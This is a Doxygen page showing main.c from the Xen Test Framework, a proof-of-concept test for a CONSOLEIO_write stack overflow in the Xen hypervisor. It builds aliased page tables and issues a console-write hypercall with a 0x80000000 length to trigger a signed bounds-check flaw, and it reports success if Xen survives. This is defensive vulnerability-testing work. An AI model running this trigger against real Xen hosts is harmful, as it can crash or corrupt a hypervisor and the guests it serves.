Xen Test Framework
main.c
Go to the documentation of this file.
1
19#include <xtf.h>
20
21const char test_title[] = "CONSOLEIO_write stack overflow PoC";
22
23uint8_t zero_page[PAGE_SIZE] __page_aligned_bss __used;
24
25/* Have the assembler build an L1/L2 pair mapping zero_page[] many times. */
26asm (".section \".data.page_aligned\", \"aw\";"
27 ".align 4096;"
28
29 "l1t:"
30 ".rept 512;"
31 ".long zero_page + "STR(PF_SYM(AD, P))", 0;"
32 ".endr;"
33 ".size l1t, . - l1t;"
34 ".type l1t, @object;"
35
36 "l2t:"
37 ".rept 512;"
38 ".long l1t + "STR(PF_SYM(AD, P))", 0;"
39 ".endr;"
40 ".size l2t, . - l2t;"
41 ".type l2t, @object;"
42
43 ".previous;"
44 );
45extern intpte_t l2t[512];
46
47void test_main(void)
48{
49 /* Map 2G worth of zero_page[] starting from 1G... */
50 pae_l3_identmap[1] = pae_l3_identmap[2] = pte_from_virt(l2t, PF_SYM(AD, P));
51
52 /*
53 * ... , write those zeros with a length possible to be confused by a
54 * signed bounds check...
55 */
56 hypercall_console_write(_p(GB(1)), 0x80000000);
57
58 /* ... and if Xen is still alive, it didn't trample over its own stack. */
59
60 xtf_success("Success: Not vulnerable to CONSOLEIO_write stack overflow\n");
61}
62
63/*
64 * Local variables:
65 * mode: C
66 * c-file-style: "BSD"
67 * c-basic-offset: 4
68 * tab-width: 4
69 * indent-tabs-mode: nil
70 * End:
71 */
__used
#define __used
Definition: compiler.h:14
__page_aligned_bss
#define __page_aligned_bss
Definition: compiler.h:37
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110
test_title
const char test_title[]
The title of the test.
Definition: main.c:24
hypercall_console_write
static void hypercall_console_write(const char *buf, unsigned long count)
Definition: hypercall.h:196
STR
#define STR(x)
Stringise an expression, expanding preprocessor tokens.
Definition: macro_magic.h:17
_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48
GB
#define GB(num)
Express num in Gigabytes.
Definition: numbers.h:29
PAGE_SIZE
#define PAGE_SIZE
Definition: page.h:11
intpte_t
unsigned long intpte_t
Definition: page.h:152
pte_from_virt
intpte_t pte_from_virt(const void *va, uint64_t flags)
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
uint8_t
__UINT8_TYPE__ uint8_t
Definition: stdint.h:14
PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108
zero_page
uint8_t zero_page[PAGE_SIZE]
Definition: main.c:23
l2t
intpte_t l2t[512]
Generated by doxygen 1.9.4